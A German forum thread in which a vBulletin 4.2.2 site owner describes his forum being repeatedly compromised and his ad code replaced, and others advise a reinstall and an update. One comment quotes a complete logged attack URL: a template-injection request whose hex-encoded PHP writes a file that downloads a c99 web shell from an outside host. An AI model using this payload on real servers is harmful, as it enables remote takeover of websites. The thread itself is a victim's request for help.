Frage von Evergreen89, 29

Hat noch jemand ein t.php in seiner vBulletin Forensoftware?

Auf meiner Webseite wird seit 2 Wochen regelmässig mein Adsense Anzeigen-Code ausgetaucht. Nach der Suche in den Protokollen bin ich auf das Problem gestoßen. Ich nutze neben der eigentlich Webseite auch vBulletin (4.2.2 PL4). Ich den Logfiles habe ich dann die Datei t.php gefunden, mit der meine Anzeigen wohl ausgetauscht wird. Nachdem ich mir die Datei genauer anschauen wollte, sprang auf dem PC gleich mal der Virenscanner an.

Hat noch jemand das Problem damit? Die Datei ist gelöscht. Wie sie aber auf den Server gelangen konnte, ist mir ein Rätsel.

Antwort
von Sawascwoolf, 16

Das austauschen einer einzelnen Datei, bzw. das updaten hilft hier wohl leider nichts. Der Virus wird sicherlich einige Dateien erzeugt haben die sich in der Dateistruktur von VBulletin eingenistet haben.

Da hilft vermutlich nur (wenn überhaupt) ein löschen aller Dateien, und eine Neuinstallation.

Denn auch über die Datenbank lässt sich sicherlich irgendwie ebenfalls wieder Schadcode einfügen.

Kommentar von Evergreen89 ,

Ja, ich habe gestern Abend eine neuinstallation durchgeführt. Leider hat das nicht viel gebracht, denn heute morgen um 5 Uhr war gleich der nächste Angriff. Zumindest konnte ich jetzt wohl die Lücke finden, wie die Datei auf den Server gelangen konnte:

http://domain.de/members/278.html?a=$stylevar[${${file_put_contents(\"v.php\",\"\\x3C\\x3F\\x70\\x68\\x70\\x0A\\x24\\x68\\x6F\\x6D\\x65\\x70\\x61\\x67\\x65\\x20\\x3D\\x20\\x66\\x69\\x6C\\x65\\x5F\\x67\\x65\\x74\\x5F\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x73\\x28\\x27\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x72\\x35\\x37\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x6E\\x65\\x74\\x2F\\x73\\x68\\x65\\x6C\\x6C\\x2F\\x63\\x39\\x39\\x2E\\x74\\x78\\x74\\x27\\x29\\x3B\\x0A\\x24\\x66\\x20\\x3D\\x20\\x66\\x6F\\x70\\x65\\x6E\\x28\\x27\\x74\\x2E\\x70\\x68\\x70\\x27\\x2C\\x27\\x77\\x27\\x29\\x3B\\x0A\\x66\\x77\\x72\\x69\\x74\\x65\\x28\\x24\\x66\\x2C\\x24\\x68\\x6F\\x6D\\x65\\x70\\x61\\x67\\x65\\x29\\x3B\\x0A\\x3F\\x3E\")}}]
Kommentar von Sawascwoolf ,

Ui, ok das scheint mir eine gravierende Sicherheitslücke in der Software zu sein. Hast du das schon an der entsprechenden Stelle gemeldet?

Antwort
von maximilianus7, 19

wie? der virenscanner (welcher ?) springt bei einer reinen textdatei an? was stand denn da drin? was für ein virus wurde gemeldet?

Kommentar von Evergreen89 ,

Habe Avira AntiVirus Free. War keine Textdatei sondern wie geschrieben eine PHP-Datei. Was drinne stand wollte ich nach der Meldung nicht wissen.

Das vBulletin Diagnose-Tool hat mir doch recht viele unbekannte, nicht-vBulletin Dateien angezeigt. Darunter auch adminer.php (etwas wie phpmyadmin). Jetzt wird erstmal auf vB 4.2.3 geupdatet. In der Hoffnung das die Lücke zu ist.

Keine passende Antwort gefunden?

Fragen Sie die Community

Weitere Fragen mit Antworten